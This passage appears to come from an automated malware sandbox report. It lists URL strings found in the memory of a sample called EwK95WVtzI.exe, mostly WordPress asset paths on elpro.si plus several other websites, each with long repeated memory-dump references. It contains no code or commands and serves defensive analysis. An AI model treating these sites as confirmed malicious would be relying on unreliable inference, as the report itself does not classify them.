00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header_new.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/classic-themes.min.css?ver=6.2.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/wlwmanifest.xml
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/K
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/a
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/e
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/ijj
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/7
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/W
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/Ew
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/N
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/W~
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/aw
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/0
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/O
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/Z
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/w
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com//s
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/o/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/v1.0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnsds.org/s
                Source: EwK95WVtzI.exe, 00000000.00000002.2749160833.000000000374D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000166B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000166B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/v.
                Source: EwK95WVtzI.exe, 00000000.00000002.2765079212.0000000003F7D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/A
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/X
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/Y
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/m
                Source: EwK95WVtzI.exe, 00000000.00000002.2765079212.0000000003F7D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.comP
